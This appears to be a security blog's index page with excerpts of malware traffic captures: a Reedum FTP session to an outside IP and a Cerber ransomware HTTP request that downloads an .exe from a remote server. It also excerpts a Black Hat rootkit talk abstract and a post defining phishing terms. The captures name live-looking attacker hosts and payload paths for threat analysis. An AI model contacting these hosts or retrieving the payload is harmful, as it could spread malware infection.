APT – Advanced Persistent Threat / MALWARE – Reedum – Historical Traffic Sample

1970-01-01 -4:-59:-35.7292 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 1:17, ack 62, win 64179, length 16 E..8.X@….p …m…….X{.a…?P…l…USER user37704 1970-01-01 -4:-59:-35.7292 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 17, win 65535, length 0 E..(….@.`.m… ……….?X{.qP…|… 1970-01-01 -4:-59:-35.7866 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 62:141, ack 17, win 65535, length 79 E..w….@.`rm… ……….?X{.qP…kZ..331 ……………… ………… … Read more

BLACKHAT BLACK HAT 2016 USA VEGAS BRIEFING – HORSE PILL: A NEW TYPE OF LINUX ROOTKIT

Location:  South Seas CDF Date: Thursday, August 4 | 12:10pm-1:00pm Format: 50 Minute Briefing Tracks: Malware Platform Security: VM, OS, Host and Container What if we took the underlying technical elements of Linux containers and used them for evil? The result a new kind rootkit, which is even able to infect and persist in systems with … Read more

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE

Example of files that were encrypted and protected: The domain name ftoxmpdipwobp4qy.joa688.top was NX and not required for the purchase process. 2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1E..W..@……..fH……P.n……P…….GET //up1/1/4fv3b5.exe HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; … Read more

Similarities and Differences in the terms Phishing, Malvertising, Spam and Malware E-mails

What is Phishing? What are malvertising, spam e-mail and malware e-mail campaigns?  These terms have started to become intertwined and used interchangeably which generally means that there is a lack of understanding in the IT community which is typical. Over time laziness and improper training has a way of bending security definitions into bundles. A great example … Read more